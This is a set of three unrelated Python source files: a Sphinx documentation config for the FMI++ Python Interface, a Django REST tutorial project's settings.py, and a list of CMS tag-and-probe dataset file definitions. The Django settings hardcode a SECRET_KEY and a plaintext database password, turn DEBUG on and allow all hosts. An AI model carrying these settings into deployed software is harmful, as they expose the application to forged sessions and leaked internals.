| 2023-08-16T18:09:06.182871 | 2022-11-22T15:38:07 | 2022-11-22T15:38:07 | 222,248,323 | 0 | 1 | null | 2019-11-17T12:58:34 | 2019-11-17T12:58:33 | null |
UTF-8
|
Python
| false | false | 5,603 |
py
|
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'The FMI++ Python Interface'
copyright = 'AIT Austrian Institute of Technology GmbH'
author = 'AIT FMI++ Development Team'
# The short X.Y version
version = '2.0'
# The full version, including alpha/beta/rc tags
release = '2.0.0'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.extlinks'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The name of an image file (relative to this directory) to place at the top of the sidebar.
html_logo = 'img/logo_fmipp.svg'
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'PyFMIPP'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PyFMIPP.tex', 'The FMI++ Python Interface',
'AIT FMI++ Development Team', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'fmipp', 'The FMI++ Python Interface',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PyFMIPP', 'The FMI++ Python Interface',
author, 'PyFMIPP', 'The FMI++ Python Interface is a Python wrapper for the FMI++ Library',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# External link library
extlinks = {
'github_blob': ('https://github.com/fmipp/py-fmipp/blob/main/%s', ''),
'github_tree': ('https://github.com/fmipp/py-fmipp/tree/main/%s', ''),
}
|
[
"[email protected]"
] | |
c3952e3f2d8c1e4e37d335f16d761e86e26fa2f7
|
c0e50f13fe0e20a974b7aeb7db5d5018ecc9a1aa
|
/DjangoRestApis/settings.py
|
12c1f47d386f10f97e06b9da39b0f6efde832eb5
|
[] |
no_license
|
ducquang2/DjangoRestApis
|
4c39b1818caf27396e7af8163c7e661f2813268e
|
38f503c5e387b6e6a7297f84c258ad2fdb3669d7
|
refs/heads/master
| 2023-02-20T05:15:40.566619 | 2021-01-26T07:51:34 | 2021-01-26T07:51:34 | 332,125,499 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,770 |
py
|
"""
Django settings for DjangoRestApis project.
Generated by 'django-admin startproject' using Django 3.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(a6+e3mbyv3y6b^^_mkpawrd()i66o-f9muuepiin%5f@hth#0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
# Tutorials application
'tutorials.apps.TutorialsConfig',
# CORS
'corsheaders',
]
MIDDLEWARE = [
# CORS
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'DjangoRestApis.urls'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework_simplejwt.authentication.JWTAuthentication',
],
}
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'DjangoRestApis.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
'USER': 'quang',
'PASSWORD': '123',
'HOST': '127.0.0.1',
'PORT': '5432',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
ALLOWED_HOSTS = ['*']
CORS_ORIGIN_ALLOW_ALL = False
CORS_ORIGIN_WHITELIST = (
'http://localhost:8081',
'http://localhost:8082',
'http://192.168.1.204:8082',
'http://172.16.4.177:8082',
'http://172.16.4.227:1234',
)
|
[
"[email protected]"
] | |
544535a12e8aebb81a573d170387a9a53d5e9f99
|
1e21f0939d4c46db8eeca9fa8ef034ed14b7a549
|
/PhotonTnP_SampleProduction/crab/tnpDatasetDef.py
|
948c5aa42935bdee103b37980cbee893ae9ef5e9
|
[] |
no_license
|
Ming-Yan/photonTnp
|
4e46286998d4e2806e423e2e27893c0a8675494f
|
5468bea3eff51b21eed2701cda4f3e5d2ad9e6bf
|
refs/heads/master
| 2021-10-08T20:33:55.910375 | 2018-10-22T09:12:26 | 2018-10-22T09:12:26 | 162,109,988 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 19,961 |
py
|
datasetsForTnP = [
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph_Spring16_reHLT', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph_Spring16_reHLT.root', 'lumi': -1, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': 5.767, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunC', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunC.root', 'lumi': 2.646, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunD', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunD.root', 'lumi': 4.353, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunE', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunE.root', 'lumi': 3.985, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunF', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunF.root', 'lumi': 3.160, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunG', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunG.root', 'lumi': 7.539, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016prompt_RunH', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016prompt_RunH.root', 'lumi': 8.762, 'nEvts': -1},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_DYToLL_madgraph_Winter2017//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph_Winter2017', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph_Winter2017.root', 'lumi': -1, 'nEvts': 49748967},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20_vRECO/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunB//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': 5.899, 'nEvts': 238592033},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunC//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunC', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunC.root', 'lumi': 2.646, 'nEvts': 93326652},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunD//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunD', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunD.root', 'lumi': 4.353, 'nEvts': 146480008},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20_vRECO/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunE//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunE', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunE.root', 'lumi': 4.050, 'nEvts': 113169852},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunF//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunF', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunF.root', 'lumi': 3.160, 'nEvts': 70143321},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20_vRECO/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunG//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunG', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunG.root', 'lumi': 7.391, 'nEvts': 148781520},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20_vRECO/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016prompt_RunHv2//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016prompt_RunH', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016prompt_RunH.root', 'lumi': 8.762, 'nEvts': 123900510},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunB//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': 5.349, 'nEvts': 235522176},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunC//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunC', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunC.root', 'lumi': 2.363, 'nEvts': 92067646},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunD//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunD', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunD.root', 'lumi': 4.256, 'nEvts': 146495223},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunE//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunE', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunE.root', 'lumi': 3.981, 'nEvts': 111208237},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunF//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunF', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunF.root', 'lumi': 3.105, 'nEvts': 70143321},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunG//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunG', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunG.root', 'lumi': 7.544, 'nEvts': 152098617},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunH//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunH', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunH.root', 'lumi': 6.105, 'nEvts': 89863172},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_DYToLL_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph.root', 'lumi': -1, 'nEvts': 33584160},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunB//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunB', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunB.root', 'lumi': -1, 'nEvts': 7384544},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunC//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunC', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunC.root', 'lumi': -1, 'nEvts': 79103372},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunD//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunD', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunD.root', 'lumi': -1, 'nEvts': 124968333},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunF//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunF', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunF.root', 'lumi': -1, 'nEvts': 64744869},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunG//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunG', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunG.root', 'lumi': -1, 'nEvts': 138296792},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_DYToLL_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph.root', 'lumi': -1, 'nEvts': 44983870},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunB//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': -1, 'nEvts': 116256313},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunB//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': 5.364, 'nEvts': 236233675},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunC//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunC', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunC.root', 'lumi': 1.810, 'nEvts': 70759545},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunD//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunD', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunD.root', 'lumi': 4.241, 'nEvts': 145990095},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunE//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunE', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunE.root', 'lumi': 4.054, 'nEvts': 113169852},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunF//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunF', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunF.root', 'lumi': 3.085, 'nEvts': 69673589},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunG//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunG', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunG.root', 'lumi': 7.521, 'nEvts': 151654044},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_2016_RunB/results/processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'SingleElectron_2016_RunB', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/data//TnPTree_SingleElectron_2016_RunB.root', 'lumi': 5.657, 'nEvts': 228669688},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_13_patch1/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_2016_RunC//results/processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'SingleElectron_2016_RunC', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/data//TnPTree_SingleElectron_2016_RunC.root', 'lumi': 1.761, 'nEvts': 63419101},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_DYToLL_madgraph/results/processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8.root', 'lumi': -1, 'nEvts': 36311064},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_DYToLL_mcAtNLO//processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8.root', 'lumi': -1, 'nEvts': 28696958},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_WJets_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'WJetsToLNu_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/mc//TnPTree_WJetsToLNu_TuneCUETP8M1_13TeV-madgraphMLM-pythia8.root', 'lumi': -1, 'nEvts': 24908024},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_phov2/crab_2016_RunB//results/processedLumis.json', 'campaign': 'crab_projects_phov2', 'dataset': 'SingleElectron', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/phov2/data//TnPTree_SingleElectron.root', 'lumi': 5.848, 'nEvts': 236203597},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_phov2/crab_DYToLL_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_phov2', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/phov2/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8.root', 'lumi': -1, 'nEvts': 41253879},
